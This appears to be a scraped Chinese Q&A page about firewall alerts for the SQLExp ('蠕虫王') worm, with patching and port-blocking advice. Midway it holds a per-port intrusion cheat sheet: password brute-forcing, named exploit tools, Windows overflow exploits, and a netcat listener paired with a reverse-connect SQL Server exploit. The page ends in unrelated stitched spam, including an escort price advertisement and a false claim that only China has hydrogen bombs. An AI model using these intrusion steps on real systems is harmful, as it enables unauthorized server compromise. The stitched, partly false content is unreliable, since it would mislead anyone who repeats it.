呵呵,你把它的监控调到高级别了吧,建议调到中,那些接收数据包的就没有的,而那些SQLExp攻击是针对网吧等数据库的,对我们一般的家用户是没威胁的,放心就好,
“蠕虫王”是一个极为罕见且极其短小的蠕虫病毒,英文名为Worm.SQLexp.376,主要通过 Microsoft SQL Server的漏洞发动攻击,极具破坏力。 蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度 极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。易受 “蠕虫王”攻击的机器类型为所有安装有Microsoft SQL Server 2000并且没有修补漏洞的 NT系列服务器,包括WinNT/Win2000/WinXP等,不会感染Win9X系统。由于蠕虫王并不对是 否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机 器因瘫痪而停止服务,危害极为惊人。
防火墙只是根据端口来辨别攻击的.这通常不准确,所以应该是对应端口被攻击而已.而防火墙把所有不符合规则的数据包都称之为攻击,有时这些攻击其实就是正常的数据包.
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。
端口 协议 应用程序
21 TCP FTP
25 TCP *** TP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
将下面的端口关闭
TCP
21
22
23
25 TCP *** TP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 *** b
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
端口入侵:
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
一般来说是 利用电脑 的SQL漏洞进行攻击,只要打上补丁,把漏洞补上就可以了
SQLEXP是“蠕虫王”
“蠕虫王”蠕虫文档:
病毒名称:Worm.SQLexp.376
危险级别:中
破坏性:中
传播速度:高
病毒特征:蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。该蠕虫攻击安装有Microsoft SQL 的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。由于蠕虫王并不对是否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机器因瘫痪而停止服务,危害极为惊人。
历来以对数据保护完整性著称的SQL Server数据库居然也存在漏洞,并被黑客利用,这大大出乎人们的意料之外。2003年1月25日爆发的Win32.SQLExp.Worm蠕虫病毒带给我们的启示是多方面的。归根结底,这又是一次由微软系统的漏洞引发的互联网危机。
趋势科技总裁张明正先生曾经预言:全球每18个月就会有一种影响巨大的恶性病毒发生。2003年1月25日爆发的影响全球80%网民上网的Win32.SQLExp.Worm蠕虫病毒,相距2001年7月份给全球信息系统带来深重灾难、并从此改写病毒发展历史的红色代码和Nimda病毒,正好整整18个月!
SQLExp曾经导致中国 *** 在2003年大面积瘫痪,专杀工具没什么,打好补丁就可以了。
相关的微软补丁下载地址为:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602
应该说你的电脑没事 你按的是金山吧.那已经被拦截了
这是你所处的那个局域网内有病毒或工具在扫描你
相关的知识:
SQLExp攻击是什么攻击?
“蠕虫王”蠕虫文档:
病毒名称:Worm.SQLexp.376
危险级别:中
破坏性:中
传播速度:高
病毒特征:该蠕虫攻击安装有Microsoft SQL 的NT系列服务器,该病毒尝试探测被攻击机器的1434/udp端口,如果探测成功,则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞,使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。
病毒查杀防护
1,直接下载微软指定的补丁程序 或者 安装Microsoft SQL Server 2000 SP3。
2,在防火墙或者路由器上阻塞外部对内的和内部对外的UDP/1434端口的访问。
3,如果由于DoS导致系统反映慢,可先断开连接,然后在Windows任务管理器里强行终止进程SqlServr.exe,打上相应补丁并重新启动服务.
看看是在哪个端口的
然后把端口屏蔽了就可以了
我也经常碰到扫描我SQL的嗅探。一般在路由器上查到是哪个端口
然后再在本地IP安全策略里封了端口就可以了。
北京商务小学妹价格表3000一次【严红恋】 今天给大家分享的内容是“北京商务小学妹价格表3000一次【严红恋】”,我是严红恋,来自崇左市,今年21岁,作为职业:未透露,我热爱我的职业:未透露。三圍...
本文导读目录: 1、红杉资本遭遇黑客攻击,投资者信息或已被窃取,黑客都是怎样攻破防火墙的? 2、股民在股票账户里的钱安全吗?能被其他人挪走吗? 3、黑客们常说肉鸡什么的是什么意思? 有什么作用...
企业规模一般分为特大型、大型、中型、小型等分类。对于不同的企业规模,适合的邮箱类型也不一样。那么,公司在选择时,用163VIP邮箱好还是163企业邮箱好呢?下面,小编分享选择邮箱的2大技巧!...
文章转载自:香港地产资讯网 将军澳慧星汇加推25舖应市 由资深投资者蔡志忠等人投资持有的将军澳慧星汇,周六拆售首批50个舖位,不足40分钟成功沽清,大约套现1.3亿米。大业主刚加推25个舖位应市,...
i73630QMi7:7是系列,属于高端系列,共有i3,i5,i7,数字越大档次越高;3630:第一个3,第3代i系列CPU,表示第3代;6:区。 表示区别不同处理器的型号、代数。2开头就是第二代,比...
为什么只有中国有氢弹 氢弹为什么只有中国有因为大物理学家于敏所创造的“于敏构型”物美价廉的优点,所以中国是现在世界上唯一拥有氢弹的国家。制造出后要在短时间能用掉否者容易出事失效。因为中国氢弹的弹头可以...